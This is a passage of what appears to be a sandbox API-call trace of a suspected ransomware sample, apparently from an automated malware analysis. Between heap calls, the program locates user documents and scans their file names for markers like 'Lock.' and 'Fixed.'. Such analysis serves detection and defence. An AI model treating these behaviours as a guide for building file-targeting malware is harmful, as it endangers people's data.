RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0262.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0262.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0262.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0262.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0262.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0262.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0262.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0262.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0262.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0262.299] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/EJnozy8q_wA_6u.odt", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EJnozy8q_wA_6u.odt", lpFilePart=0x8bf658*="EJnozy8q_wA_6u.odt") returned 0x3a [0262.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0262.299] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EJnozy8q_wA_6u.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ejnozy8q_wa_6u.odt")) returned 0xffffffff [0262.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0262.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0262.300] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0262.300] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.300] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0262.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0262.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0262.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0262.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0262.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0262.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G0mzKIgpl5aj2M-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0mzKIgpl5aj2M-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mzKIgpl5aj2M-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zKIgpl5aj2M-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KIgpl5aj2M-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Igpl5aj2M-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gpl5aj2M-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pl5aj2M-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l5aj2M-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5aj2M-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aj2M-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j2M-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2M-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.302] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0262.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.302] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0262.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G0mzKIgpl5aj2M-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0mzKIgpl5aj2M-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mzKIgpl5aj2M-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zKIgpl5aj2M-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KIgpl5aj2M-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Igpl5aj2M-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gpl5aj2M-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pl5aj2M-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l5aj2M-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5aj2M-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aj2M-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j2M-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2M-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.303] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0262.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0262.303] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0262.303] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0262.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0262.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0262.303] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0262.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0262.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0262.304] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0262.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0262.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.304] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0262.304] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.304] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0262.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.304] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0262.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.305] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.305] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.305] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/G0mzKIgpl5aj2M-.pptx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25439ff0, ftCreationTime.dwHighDateTime=0x1d49ccb, ftLastAccessTime.dwLowDateTime=0xcce10f20, ftLastAccessTime.dwHighDateTime=0x1d4b5fa, ftLastWriteTime.dwLowDateTime=0xcce10f20, ftLastWriteTime.dwHighDateTime=0x1d4b5fa, nFileSizeHigh=0x0, nFileSizeLow=0x13626, dwReserved0=0xb4b0047, dwReserved1=0x23f52, cFileName="G0mzKIgpl5aj2M-.pptx", cAlternateFileName="G0MZKI~1.PPT")) returned 0xaa5920 [0262.305] FindClose (in: hFindFile=0xaa5920 | out: hFindFile=0xaa5920) returned 1 [0262.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.306] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0262.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0262.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0262.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.308] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.308] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0262.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0262.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0262.308] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.309] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0262.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0262.309] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0262.309] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.310] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0262.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.310] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 